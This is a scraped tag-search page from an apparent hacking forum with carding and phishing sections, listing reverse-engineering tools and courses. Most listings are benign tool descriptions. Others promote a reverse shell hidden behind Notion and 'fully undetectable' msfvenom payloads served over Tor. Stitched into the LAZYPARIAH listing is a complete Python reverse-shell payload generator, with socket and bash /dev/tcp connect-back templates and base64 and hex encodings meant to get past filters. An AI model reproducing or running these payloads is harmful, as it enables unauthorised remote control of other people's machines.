Showing results for tags 'reverse'.

The search index is currently processing. Current results may not be complete.
  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Staff Control
    • Staff Announcements
    • Moderators
    • Staff
    • Administration
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Pentesting Zone
    • Pentesting Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
    • Windows Phone
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Pentesting Premium
    • Pentesting Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Pentesting Zone PRIV8
    • Pentesting Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area
  • Recycle Bin
    • Recycle
  • Null3D's Nulled Group

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me


Location


Interests


Occupation


TeamViewer


Twitter


Facebook


Youtube


Google+


Tox

  1. This framework helps with reverse engineering Flutter apps using a patched version of the Flutter library, which is already compiled and ready for app repacking. This library has a snapshot deserialization process modified to allow you to perform dynamic analysis in a convenient way.

    Key features: socket.cc is patched for traffic monitoring and interception; dart.cc is modified to print classes, functions, and some fields; displays the absolute code offset for functions; contains minor changes for successful compilation; if you would like to implement your own patches, manual Flutter code changes are supported using a specially crafted Dockerfile.

    Supported engines: Android: arm64, arm32; iOS: arm64. Release: Stable, Beta.
  2. Riptide is a tool allowing you to reverse .EXE files compiled with PyInstaller back to the original Python source, showing you the source code of the file.
  3. Description: If you are completely new to Cutter and want to get up and running fast then this course is for you. In this course, we will cover how to use Cutter for Windows and Linux. Cutter is an advanced, GUI-based, free and open-source reverse-engineering platform designed to take the pain out of radare2. Its backend is running Rizin, a fork of the radare2 engine. Cutter is created by reverse engineers for reverse engineers. Cutter releases are fully integrated with the native Ghidra decompiler. Not only can Cutter disassemble a binary file, but it can also decompile it to C language. It also has a linear disassembly view, a fully featured graph view as well as a mini-graph for fast navigation. Cutter also features the ability to reverse debug, which other debuggers lack. This feature allows you to not only step forwards, but also step backwards! Cutter also has hexdumps and a stack view which allow you to trace the stack and registers and inspect memory on the fly. In addition to that, you can also patch the binary by reversing jumps and modifying instructions and bytes. This course will teach you all of the above and more. Designed with beginners in mind. Simple Windows and Linux crackmes designed to learn reverse engineering legally. Practical and hands-on. Using free tools only.

    Suitable for: Reverse Engineering and Malware Analysis students; anyone interested in learning to use Cutter for Reverse Engineering; security researchers.

    Prerequisites: Windows PC. Basic Assembly and C/C++ language would be helpful but not mandatory. Familiarity with basic Linux commands would be useful but not mandatory. Everything you need to know is covered in the course. Enroll now and I will see you inside!

    Who this course is for: Anyone interested in learning to use Cutter for Reverse Engineering; reverse engineering and malware analysis students; security researchers.

    Requirements: Basic Assembly Language, C Programming, Windows PC, Basic Linux commands.
  4. Cutter is a Qt and C++ GUI for radare2. Its goal is making an advanced, customizable and FOSS reverse-engineering platform while keeping the user experience in mind. Cutter is created by reverse engineers for reverse engineers.

    Disclaimer: Cutter is not aimed at existing radare2 users. It instead focuses on those who are not yet radare2 users because of the learning curve, because they don’t like CLI applications or because of the difficulty/instability of radare2.

    Changelog v2.1. Additions: Adds signatures widget for managing FLIRT signatures. Supports and bundles SigDB, a library of FLIRT signatures for commonly found libraries. Bundles the new Yara plugin to apply and create yara rules. Bundles Apple Swift demangler. Adds option to fill missing bytes with nops when editing an instruction. Adds hexeditor option to write hex bytes. Adds option to add comments directly from hexdump widget. Uses RzAnnotatedCode with JSDec for colored output with semantic information. Adds double click to seek to global variable in decompiler widget. Adds report issue button in “About”. Many internal rizin commands have been translated to their C equivalent. Enables console redirection on Windows. Bugfixes: Adds missing Rizin headers in Python bindings. Fixes gdbserver segfault.
  5. Reverse Engineers’ Hex Editor: A cross-platform (Windows, Linux, Mac) hex editor for reverse engineering, and everything else.

    Features: Large (1TB+) file support. Decoding of integer/floating-point value types. Inline disassembly of machine code. Highlighting and annotation of ranges of bytes. Side by side comparison of selections. Lua scripting support (API reference here). Virtual address mapping support.

    Changelog v0.5.3: Correctly nest comments when updating comments panel (#169). Update text in comments panel when a comment is modified. Fix display of >4GiB virtual offsets in files that are <=4GiB (#170). Add support for code page 437 (IBM) and 932/936/949/950 (Microsoft). Fix handling of multibyte character boundaries in document view. Draw wide characters in document view (#173). Move forwards/backwards and select whole instructions from disassembly in document view. Don’t capture tab key press in text area of document view. Add missing error checks. Add number base option to “Jump to offset” dialog. Drawing optimisations (improves responsiveness), particularly on macOS. Fix some undefined behaviour issues.
  6. A Hex Editor for Reverse Engineers, Programmers, and people that value their eyesight when working at 3 AM.

    Features: Featureful hex view; Byte patching; Patch management; Copy bytes as feature (Bytes, Hex string, C, C++, C#, Rust, Python, Java & JavaScript array, ASCII-Art hex view, HTML self-contained div); String and hex search; Colorful highlighting; Goto from start, end, and current cursor position; Custom C++-like pattern language for parsing and highlighting a file’s content (Automatic loading based on MIME-type; arrays, pointers, structs, unions, enums, bitfields, using declarations, little and big-endian support; Useful error messages, syntax highlighting, and error marking); Data importing (Base64 files, IPS and IPS32 patches); Data exporting (IPS and IPS32 patches); Data inspector allowing interpretation of data as many different types (little and big-endian); Huge file support with fast and efficient loading; Strings search (Copying of strings, Copying of detangled strings); File hashing support (CRC16 and CRC32 with custom initial values and polynomials; MD4, MD5; SHA-1, SHA-224, SHA-256, SHA-384, SHA-512); Disassembler supporting many different architectures (ARM32 (ARM, Thumb, Cortex-M, aarch32), ARM64, MIPS (MIPS32, MIPS64, MIPS32R6, Micro), x86 (16 bit, 32 bit, 64 bit), PowerPC (32 bit, 64 bit), Sparc, SystemZ, XCore, M68K, TMS320C64X, M680X, Ethereum); Bookmarks (Region highlighting, Comments); Data Analyzer (File magic-based file parser and MIME type database, Byte distribution graph, Entropy graph, Highest and average entropy, Encrypted / Compressed file detection); Helpful tools (Itanium and MSVC demangler, ASCII table, Regex replacer, Mathematical expression evaluator (Calculator), Hexadecimal Color picker, Built-in cheat sheet for pattern language and Math evaluator); Doesn’t burn out your retinas when used in late-night sessions.

    Changelog v1.18.2. Additions: Added Brazilian Portuguese translation. Huge thanks to @dgsmiley18. Added IEEE 754 floating-point number experimenting tool. Completely rewrote the Hash view: it now supports displaying multiple different Hash types at the same time; configured hashes now also appear in the hex editor when selecting a region, hovering the cursor over it and holding down SHIFT. Added tooltip to all Visualizer data processor nodes that display the visualization a lot bigger. Improvements: Improved contrast of the pattern language error popup text color in light mode. Bug Fixes: Fixed editing values in the hex editor. Fixed another scroll issue in the hex editor. Fixed pasting bytes in the hex editor view. Fixed bookmarks automatically collapsing when editing their name. Fixed a crash when the OS didn’t configure monitors correctly (this mainly happens when using Windows Remote Desktop).
  7. FOR: Hiding attacker IP in reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell). Demo/Quick proof insertion within report. Highly available and shareable reverse shell (desktop, browser, mobile). Encrypted and authenticated remote shell. NOT FOR: Long and interactive shell sessions (see tacos for that).
  8. Tool for discovering the origin host behind a reverse proxy. Useful for bypassing WAFs and other reverse proxies. How does it work? This tool will first make an HTTP request to the hostname that you provide and store the response, then it will make a request to every IP address that you provide via HTTP (80) and HTTPS (443), with the Host header set to the original host. Each HTTP response is then compared to the original using the Levenshtein algorithm to determine similarity. If the response is similar, it will be deemed a match.
  9. What is tornado? Tornado implements the Tor network with the metasploit-framework tool and msfvenom module; you can easily create hidden services for your localhost .onion domain without port forwarding. If you have experience with different remote administration tools, you probably know you need to forward a port with a virtual private network or ngrok, but with tornado the Tor network offers the possibility of making services on a machine accessible as hidden services without port forwarding, by taking advantage of the anonymity it offers and thereby preventing the real location of the machine from being exposed. tornado can: create a hidden service with the Tor network; generate a cross-platform msfvenom payload with fully undetectable shellcode execution, not shikata_ga_nai things; make the hidden service available outside the Tor network and ready for a reverse shell connection. Be careful with tor2web even on the onion network; the only suicide mission is wearing blinders. tornado is not secure from the victim's point of view: the point of Tor is that users can connect without being eavesdropped on, and going through the clearnet with tor2web, even with https, seriously cripples the efforts made to protect users. Disclaimer: This tool is only for testing and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. I assume no liability and am not responsible for any misuse or damage caused by this tool and software.
  10. HookCase is a tool for debugging and reverse engineering applications on macOS (aka OS X), and the operating system itself. It re-implements and extends Apple’s DYLD_INSERT_LIBRARIES functionality. It can be used to hook any method in any module (even non-exported ones, and even those that don’t have an entry in their own module’s symbol table). In a single operation, it can be applied to a parent process and all its child processes, whether or not the child processes inherit their parent’s environment. So HookCase is considerably more powerful than DYLD_INSERT_LIBRARIES. It also doesn’t have the restrictions Apple has placed on DYLD_INSERT_LIBRARIES. So, for example, HookCase can be used with applications that have entitlements. HookCase supports interpose hooks. But it also supports another, more powerful kind of hook that we call “patch hooks”. These can hook calls to a method named in its module’s symbol table, including ones that come from the same module. They can also hook calls to an unnamed method (one that isn’t in its module’s symbol table), by specifying the method’s address in its module. So they can be used with non-exported (aka private) methods (named and unnamed) — ones not intended for use by external modules. Patch hooks are so-called because we set them up by “patching” the beginning of an original method with a software interrupt instruction (int 0x30). HookCase’s kernel extension handles the interrupt to implement the hook. This is analogous to what a debugger does when it sets a breakpoint (though it uses int 3 instead of int 0x30). Software interrupts are mostly not used on BSD-style operating systems like macOS and OS X, so we have plenty to choose among. For now, we’re using those in the range 0x30-0x34. Whatever their disadvantages, interpose hooks are very performant. They’re implemented by changing a pointer, so they impose no performance penalty whatsoever (aside from the cost of whatever additional code runs inside the hook). 
    Patch hooks can be substantially less performant — if we have to unset the breakpoint on every call to the hook, then reset it afterward (and protect these operations from race conditions). But this isn’t needed for methods that start with a standard C/C++ prologue in machine code (which is most of them). So most patch hooks run with only a very small performance penalty (that of a single software interrupt). HookCase is compatible with DYLD_INSERT_LIBRARIES and doesn’t stomp on any of the changes it may have been used to make. So a DYLD_INSERT_LIBRARIES hook will always override the “same” HookCase interpose hook. This is because Apple often uses DYLD_INSERT_LIBRARIES internally, in ways it doesn’t document. HookCase would likely break Apple functionality if it could override Apple’s hooks. But this doesn’t apply to patch hooks. Since Apple doesn’t use them, we don’t need to worry about overriding any that Apple may have set. If an interpose hook doesn’t seem to work, try a patch hook instead. (Unless you write them to do so, neither interpose hooks nor patch hooks inherently change the behavior of the methods they hook.) HookCase is compatible with lldb and gdb: Any process with HookCase’s interpose or patch hooks can run inside these debuggers. But you may encounter trouble if you set a breakpoint and a patch hook on the same method, or try to step through code that contains a patch hook. HookCase runs on OS X 10.9 (Mavericks) through macOS 10.15 (Catalina).

    Changelog v6.0.3: macOS 12.4 once again broke HookCase, by making changes that normally only happen in major releases. This time none of the breakage was caused by changes to internal kernel structures (though some of those used by HookCase did change). Instead it was caused by two changes in behavior. HookCase 6.0.3 works around them. For more information see Issue #34.
  11. Anonymously reverse shell over the Tor network using Hidden Services without port forwarding. This project implements the Tor network with the metasploit-framework tool and msfvenom module. You can easily create hidden services for your LHOST .onion domain without port forwarding. If you have experience with different remote administration tools, you probably know you need a forwarded port with a VPN or NGROK, but in this sense the Tor network offers the possibility of making services on a machine accessible as hidden services without port forwarding, by taking advantage of the anonymity it offers and thereby preventing the real location of the machine from being exposed. Currently, this project has these features: Create a hidden service. Generate msfvenom payload with fully undetectable. Hidden service becomes available outside the Tor network. Disclaimer: This tool is only for testing and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. I assume no liability and am not responsible for any misuse or damage caused by this tool and software.
  12. This is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit you’ll have a folder on your desktop with shortcuts to RE tools like these:

    Why do I need it? You don’t. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you’ll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you’re setting up a new analysis VM.

    Included tools, by category: .NET, Compilers, Debuggers, Decompilers, Document analysis, Hexadecimal editors, PE analyzers, PE resources editors, Process monitors, Signature tools, Unpacking, Utilities.

    Changelog v2022.04. Changes: Added: Echo Mirage. elfparser-ng. entropy (closes #47). Force Toolkit. MiniDump x64dbg plugin. Notepad++. OllyDumpEx x64dbg plugin (closes #41). Removed: Bewareircd: Too specific to analyze (now rare?) IRC-based communications. dnSpy: Replaced by dnSpyEx. HyperDBG: It’s a nice project, but they don’t provide binary releases yet, meaning a lot of work for me. JRE: Replaced by JDK, which is required by Ghidra. Threadtear: It doesn’t work with the JDK required by Ghidra.
  13. efiXplorer – IDA plugin for UEFI firmware analysis and reverse engineering automation. Supported versions of Hex-Rays products: we always focus on the latest versions of IDA and Decompiler because we try to use the most recent features from new SDK releases. That means we tested only on recent versions of Hex-Rays products and do not guarantee stable work on previous generations. Why not IDApython: all code is developed in C++ because it’s a more stable and performant way to support a complex plugin and get the full power of the most recent SDK’s features. Supported Platforms: Win, Linux, and OSX (x86/x64). Changelog v4.1: [new feature] Improved SMI handlers recognition to support SxSmiHandler, IoTrapSmiHandler, UsbSmiHandler, etc. [new feature] Improved child SW SMI handlers recognition, now annotated as ChildSwSmiHandler. [new feature] Added visual representation for NVRAM variables and additional context in JSON report: address, service name, var name and var GUID. [bug fix] Numerous improvements and bug fixes in code analyzer and firmware image loader. Moving to support of IDA SDK v7.7.
  14. Learn how to Reverse Engineer Apps & Software via this detailed Course. * Learn How To Crack Software Legally And More.. Download Link: Free for users PRIV8. Submitter: dEEpEst. Submitted: 28/04/22. Category: Libro Online. Password: ********
  15. 4 downloads

    Learn how to Reverse Engineer Apps & Software via this detailed Course. * Learn How To Crack Software Legally And More.. Download Link: Free for users PRIV8
    $110 PRIV8
  16. A cross-platform (Windows, Linux, Mac) hex editor for reverse engineering, and everything else.

    Features: Large (1TB+) file support. Decoding of integer/floating-point value types. Inline disassembly of machine code. Highlighting and annotation of ranges of bytes. Side by side comparison of selections. Lua scripting support (API reference here). Virtual address mapping support.

    Changelog v0.5: Added “x86 disassembly syntax” to “View” menu to allow selecting between Intel or AT&T notation for x86 disassembly (#142). Handle file open message used for “Open With” on macOS (#144). Added --compare switch to jump straight into comparing two files (#141). Fix timer leak that can cause a crash when closing the compare window or strings panel. Add import and export functions for Intel Hex files (#102). Add online help (#147). Add Bitmap Data Visualisation tool (#29). Add Binary Template support (#138). [Emily Ellis] Save new files without the execute bit set (#154). Include highlight colour names in context menu (#153). Save write protect setting in rehex-meta.json (#143). Fix several occasional crashes.
  17. A Hex Editor for Reverse Engineers, Programmers, and people that value their eyesight when working at 3 AM.

    Features: Featureful hex view; Byte patching; Patch management; Copy bytes as feature (Bytes, Hex string, C, C++, C#, Rust, Python, Java & JavaScript array, ASCII-Art hex view, HTML self-contained div); String and hex search; Colorful highlighting; Goto from start, end, and current cursor position; Custom C++-like pattern language for parsing and highlighting a file’s content (Automatic loading based on MIME-type; arrays, pointers, structs, unions, enums, bitfields, using declarations, little and big-endian support; Useful error messages, syntax highlighting, and error marking); Data importing (Base64 files, IPS and IPS32 patches); Data exporting (IPS and IPS32 patches); Data inspector allowing interpretation of data as many different types (little and big-endian); Huge file support with fast and efficient loading; Strings search (Copying of strings, Copying of detangled strings); File hashing support (CRC16 and CRC32 with custom initial values and polynomials; MD4, MD5; SHA-1, SHA-224, SHA-256, SHA-384, SHA-512); Disassembler supporting many different architectures (ARM32 (ARM, Thumb, Cortex-M, aarch32), ARM64, MIPS (MIPS32, MIPS64, MIPS32R6, Micro), x86 (16 bit, 32 bit, 64 bit), PowerPC (32 bit, 64 bit), Sparc, SystemZ, XCore, M68K, TMS320C64X, M680X, Ethereum); Bookmarks (Region highlighting, Comments); Data Analyzer (File magic-based file parser and MIME type database, Byte distribution graph, Entropy graph, Highest and average entropy, Encrypted / Compressed file detection); Helpful tools (Itanium and MSVC demangler, ASCII table, Regex replacer, Mathematical expression evaluator (Calculator), Hexadecimal Color picker, Built-in cheat sheet for pattern language and Math evaluator); Doesn’t burn out your retinas when used in late-night sessions.

    Changelog v1.17. Additions: Added support for the new Yara console module. Pattern Language: The Pattern Language has been separated from ImHex and was moved to its own repository. This was in part made possible by @Diadlo's separation of the pattern rendering code from the rest of the runtime. A separate repository also now allows other people to include the Pattern Language in their own applications. Types can now be forward declared. Functions can now have default parameters. Bitfield fields are now selectable. Comments behind preprocessor defines are now correctly handled. Fixed recursive types not working correctly. Fixed caching for static array values. Fixed indentation for inlined variables. Fixed highlight colors of arrays not matching color shown in pattern data view. Fixed struct members that overlap with [[no_unique_address]] members not being highlighted. Fixed pointer patterns causing crashes when they are rendered. Improvements: Make ImHex build with -Wall -Wextra -Werror on all platforms. Fixed tons of clang-tidy warnings. Improved / fixed the AppImage build. Recently opened file entries are now being removed if the file doesn’t exist anymore. Disabled various menu items when no provider is loaded. Multi-viewport support has been enabled on Linux again, providing ImHex is running on an X11 system (multi-viewport support is still very buggy on Wayland). Improved the about page. Pattern values are now being cached. Thanks to @Diadlo. Mathematical expressions can now be used in the hex editor goto function. Improved look and feel of many hexadecimal input fields. Improved string search filtering. Moved bookmark delete button to their header. Information view plots now don’t capture scroll anymore and fit better into the rest of the interface. Undo and Redo buttons are only available now if that action is actually available. Data inspector endian and format radio boxes are now sliders. Bug Fixes: Fixed crash when setting a custom font and that file can’t be found. Fixed various bugs and crashes related to filesystem operations. Fixed various bugs with the Math Evaluator engine. Fixed highlighting not properly being cleared when switching to a different provider. Prevent imgui.ini from being created. Deferred calls are now handled in a thread-safe manner. Fixed interface layout not being saved properly in some cases. Fixed theme not changing properly on startup. Thanks to @PredatorCZ. Fixed issues where bookmarks did not always create highlights correctly. Fixed displaying of file stat times in information view. Fixed crash on Linux when the opened file is being modified. Thanks to @PredatorCZ.
  18. Bytecode Viewer is an Advanced Lightweight Java Bytecode Viewer, GUI Java Decompiler, GUI Bytecode Editor, GUI Smali, GUI Baksmali, GUI APK Editor, GUI Dex Editor, GUI APK Decompiler, GUI DEX Decompiler, GUI Procyon Java Decompiler, GUI Krakatau, GUI CFR Java Decompiler, GUI FernFlower Java Decompiler, GUI DEX2Jar, GUI Jar2DEX, GUI Jar-Jar, Hex Viewer, Code Searcher, Debugger and more. There is also a plugin system that will allow you to interact with the loaded classfiles, for example, you can write a String deobfuscator, a malicious code searcher, or something else you can think of. You can either use one of the pre-written plugins or write your own. It supports groovy scripting. Once a plugin is activated, it will execute the plugin with a ClassNode ArrayList of every single class loaded in BCV, this allows the user to handle it completely using ASM. Code from various projects has been used, including but not limited to: J-RET by WaterWolf JHexPane by Sam Koivu RSynaxPane by Robert Futrell Commons IO by Apache ASM by OW2 FernFlower by Stiver Procyon by Mstrobel CFR by Lee Benfield CFIDE by Bibl Smali by JesusFreke Dex2Jar by pxb1..? Krakatau by Storyyeller JD GUI/JD Core by The Java-Decompiler Team Enjarify by Storyyeller Key Features: Krakatau Integration for Bytecode assembly/disassembly. Smali/BakSmali Integration – You can now edit class files/dex files via smali! APK/DEX Support – Using Dex2Jar and Jar2Dex it’s able to load and save APKs with ease! Java Decompiler – It utilizes FernFlower, Procyon, and CFR for decompilation. Bytecode Decompiler – A modified version of CFIDE’s. Hex Viewer – Powered by JHexPane. Each Decompiler/Editor/Viewer is toggleable, you can also select what will display on each pane. Fully Featured Search System – Search through strings, functions, variables and more! A Plugin System With Built-In Plugins – (Show All Strings, Malicious Code Scanner, String Decrypters, etc) Fully Featured Scripting System That Supports Groovy. 
EZ-Inject – Graphically insert hooks and debugging code, invoke main and start the program. Recent Files & Recent Plugins. And more! Give it a try for yourself! Changelog v2.11.2 Notable Changes Java 18/19 support – @ThexXTURBOXx Security Manager has been adjusted to work on Java 18+ – @ThexXTURBOXx ASM update for Java 19 support – @ThexXTURBOXx Added Croatian, Czech, Bulgarian, Danish and Serbian translations – @Konloch Fixed running precompiled plugins – @Lucaskyy CFR interface improvements – @GraxCode / @ThexXTURBOXx Procyon update – @ThexXTURBOXx FernFlower update – @ThexXTURBOXx Jadx update – @ThexXTURBOXx Dependency updates and fixes- @ThexXTURBOXx Bytecode Disassembler improvements & additions – @GraxCode General bug fixes and improvements – @Konloch / @ThexXTURBOXx / @GraxCode And more! Thank you to everyone who has contributed to this patch. @ThexXTURBOXx / @Konloch / @GraxCode / @Lucaskyy [hide][Hidden Content]]
  19. Aka my wip gui for android reverse engineers and crackers. Built on top of pyqt5 (compatible with all os’s), Frida and some terrible code. Features Quick spawn, inject and sleep at application onCreate Hook natives, java and loading modules cycle before initializations Hooks conditions and js script logic Manipulate memory and arguments Memory and disasm view (Powered by capstone) Switch between hooks on different threads Inputs are evaluated. Frida js api and dwarf shortcuts are usable in almost any input field Variables creation Save and load back hooks and variables [Hidden Content]
  20. Description *Get the Official Certificate after Completing the Course Learn Malware Analysis and Reverse Engineering Deeply with CRMA+ 2022 Course. Breaking something down and putting it back together is a process that helps people understand how things were made. A person would be able to redo and reproduce an origami by unfolding it first. Knowing how cars work requires understanding each major and minor mechanical part and their purposes. The complex nature of the human anatomy requires people to understand each and every part of the body. How? By dissecting it. Reverse engineering is a way for us to understand how things were designed, why is it in its state, when it triggers, how it works, and what its purpose is. In effect, the information is used to redesign and improve for better performance and cost. It can even help fix defects. It is amazing, and rather disconcerting, to realize how much software we run without knowing for sure what it does. We buy software off the shelf in shrink wrapped packages. We run setup utilities that install numerous files, change system settings, delete or disable older versions and superseded utilities, and modify critical registry files. Every time we access a Website, we may invoke or interact with dozens of programs and code segments that are necessary to give us the intended look, feel, and behaviour. We purchase CDs with hundreds of games and utilities or download them as shareware. We exchange useful programs with colleagues and friends when we have tried only a fraction of each program’s features. Then, we download updates and install patches, trusting that the vendors are sure that the changes are correct and complete. We blindly hope that the latest change to each program keeps it compatible with all of the rest of the programs on our system. We rely on much software that we do not understand and do not know very well at all. I refer to a lot more than our desktop or laptop personal computers. 
The concept of ubiquitous computing, or “software everywhere,” is rapidly putting software control and interconnection in devices throughout our environment. The average automobile now has more lines of software code in its engine controls than were required to land the Apollo astronauts on the Moon. Malware analysis is the study of malware’s behaviour. The objective of malware analysis is to understand the working of malware and how to detect and eliminate it. It involves analysing the suspect binary in a safe environment to identify its characteristics and functionalities so that better defences can be built to protect an organization’s network. Imagine if the Trojan Horse was thoroughly inspected and torn down before it was allowed to enter the gates of a city. This would probably cause a few dead soldiers outside the gate fighting for the city. The next time the city is sent another Trojan Horse, archers would know where to point their arrows. And no dead soldiers this time. The same is true for malware analysis—by knowing the behaviours of a certain malware through reverse engineering, the analyst can recommend various safeguards for the network. Think of it as the Trojan Horse being the malware, the analyst being the soldier who initially inspected the horse, and the city being the network of computers. Who this course is for: Beginner Reverse Engineers who curious about learning Reverse Engineering Beginner Malware Analyst who curious about learning Malware Analysis Requirements Basic Computer Understanding [Hidden Content] [Hidden Content]
  21. LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests and capture-the-flag (CTF) competitions to generate a range of reverse shell payloads on the fly.

The reverse shell payloads that LAZYPARIAH supports include (but are not limited to):
- C binary payloads (compiled on the fly): c_binary
- Ruby payloads: ruby, ruby_b64, ruby_hex, ruby_c
- PowerShell payloads: powershell_c, powershell_b64
- Base64-encoded Python payloads: python_b64
- Rust binary payloads (compiled on the fly): rust_binary
- PHP scripts containing base64-encoded Python payloads called via the system() function: php_system_python_b64
- Java classes (compiled on the fly): java_class
- Perl payloads: perl, perl_b64, perl_hex, perl_c
- Simple PHP payloads (targeting specific file descriptors): php_fd, php_fd_c, php_fd_tags

Dependencies
- Ruby >= 2.7.1 (LAZYPARIAH has not been tested on previous versions of Ruby)
- OpenJDK (Optional: only required for java_class payloads.)
- GCC (Optional: only required for c_binary payloads.)
- Rust (Optional: only required for rust_binary payloads.)

[hide][Hidden Content]]
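To make the "payload plus encoding" idea behind a generator like this concrete, here is an added example (not LAZYPARIAH's own code, and in Python rather than the tool's Ruby). The two templates, the encoding names raw/b64/hex/c, the interpreter wrappers and the host/port validation are this example's own choices; the only assumption about the target is that python3 or bash is present to run the decoded body.

```python
"""Minimal reverse-shell payload generator in the spirit of LAZYPARIAH.

Added example, not LAZYPARIAH's own code. Templates, encoding names and
wrapper commands are this example's own choices.
"""
import base64
import ipaddress
import re

# Constructed templates. {host} and {port} are filled in by generate().
TEMPLATES = {
    # connect back, duplicate the socket onto stdin/stdout/stderr, spawn a shell
    "python": (
        "import socket,subprocess,os;"
        "s=socket.socket();s.connect(('{host}',{port}));"
        "[os.dup2(s.fileno(),fd) for fd in (0,1,2)];"
        "subprocess.call(['/bin/sh','-i'])"
    ),
    # bash's /dev/tcp pseudo-device; needs bash, not plain sh
    "bash": "bash -i >& /dev/tcp/{host}/{port} 0>&1",
}

# How each encoded body is handed to an interpreter on the target.
WRAPPERS = {
    ("python", "b64"): "python3 -c \"import base64;exec(base64.b64decode('{body}'))\"",
    ("python", "hex"): "python3 -c \"exec(bytes.fromhex('{body}').decode())\"",
    ("bash", "b64"): "echo {body} | base64 -d | bash",
    ("bash", "hex"): "echo {body} | xxd -r -p | bash",
}

_HOSTNAME = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def is_valid_target(host: str, port: int) -> bool:
    """Reject anything that is not a plain IP/hostname and a TCP port.

    The template is string-substituted, so a host like "1.2.3.4;id" would
    otherwise become part of the payload and break or alter it.
    """
    if not isinstance(port, int) or not 1 <= port <= 65535:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(_HOSTNAME.match(host))


def encode(payload: str, encoding: str) -> str:
    """Encode the plain payload body as base64, hex, or a C string literal."""
    raw = payload.encode()
    if encoding == "raw":
        return payload
    if encoding == "b64":
        return base64.b64encode(raw).decode()
    if encoding == "hex":
        return raw.hex()
    if encoding == "c":
        # printable ASCII kept, quotes/backslashes escaped, the rest as \xNN
        out = []
        for b in raw:
            ch = chr(b)
            if ch in '"\\':
                out.append("\\" + ch)
            elif 0x20 <= b < 0x7F:
                out.append(ch)
            else:
                out.append(f"\\x{b:02x}")
        return '"' + "".join(out) + '"'
    raise ValueError(f"unknown encoding {encoding!r}")


def generate(kind: str, host: str, port: int, encoding: str = "raw") -> str:
    """Return a ready-to-paste payload of the given kind and encoding."""
    if not is_valid_target(host, port):
        raise ValueError("invalid host or port")
    plain = TEMPLATES[kind].format(host=host, port=port)
    if encoding in ("raw", "c"):
        return encode(plain, encoding)
    return WRAPPERS[(kind, encoding)].format(body=encode(plain, encoding))


if __name__ == "__main__":
    # Listener side would be started first, e.g.: nc -lvnp 4444
    for kind in TEMPLATES:
        for enc in ("raw", "b64", "hex", "c"):
            print(f"[{kind}/{enc}] {generate(kind, '10.0.0.5', 4444, enc)}")
```

The base64 and hex variants exist for the same reason they do in the real tool: the body survives shell quoting, filters that strip quotes or slashes, and copy-paste through web forms. The "c" form is what you would drop into a C source file, which is where a compiled payload like c_binary starts from.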
  22. A Hex Editor for Reverse Engineers, Programmers, and people that value their eyesight when working at 3 AM.

Features
- Featureful hex view
  - Byte patching
  - Patch management
  - Copy bytes as feature: Bytes, Hex string, C, C++, C#, Rust, Python, Java & JavaScript array, ASCII-Art hex view, HTML self-contained div
  - String and hex search
  - Colorful highlighting
  - Goto from start, end, and current cursor position
- Custom C++-like pattern language for parsing and highlighting a file's content
  - Automatic loading based on MIME type
  - arrays, pointers, structs, unions, enums, bitfields, using declarations, little and big-endian support
  - Useful error messages, syntax highlighting, and error marking
- Data importing
  - Base64 files
  - IPS and IPS32 patches
- Data exporting
  - IPS and IPS32 patches
- Data inspector allowing interpretation of data as many different types (little and big-endian)
- Huge file support with fast and efficient loading
- Strings search
  - Copying of strings
  - Copying of demangled strings
- File hashing support
  - CRC16 and CRC32 with custom initial values and polynomials
  - MD4, MD5
  - SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
- Disassembler supporting many different architectures
  - ARM32 (ARM, Thumb, Cortex-M, aarch32)
  - ARM64
  - MIPS (MIPS32, MIPS64, MIPS32R6, Micro)
  - x86 (16 bit, 32 bit, 64 bit)
  - PowerPC (32 bit, 64 bit)
  - Sparc
  - SystemZ
  - XCore
  - M68K
  - TMS320C64X
  - M680X
  - Ethereum
- Bookmarks
  - Region highlighting
  - Comments
- Data Analyzer
  - File magic-based file parser and MIME type database
  - Byte distribution graph
  - Entropy graph
  - Highest and average entropy
  - Encrypted / Compressed file detection
- Helpful tools
  - Itanium and MSVC demangler
  - ASCII table
  - Regex replacer
  - Mathematical expression evaluator (Calculator)
  - Hexadecimal Color picker
  - Built-in cheat sheet for pattern language and Math evaluator
- Doesn't burn out your retinas when used in late-night sessions

Changelog v1.16.2

Improvements
- Yara rules are no longer bundled with ImHex directly. Having them bundled made a bunch of different anti-virus tools very sad, so they once again need to be downloaded manually from the content store
- Patterns that use types which have been defined through a using statement now properly display their new type name in the pattern data view

Bug Fixes
- Fixed searching not working at all
- Fixed many text boxes not being writable at all

Pattern Language
- Fixed crash when using control flow statements without a value
- Fixed control flow statements not working correctly inside of custom types
- Fixed crash when using attributes
- Fixed major memory leak when using the [[format]] attribute
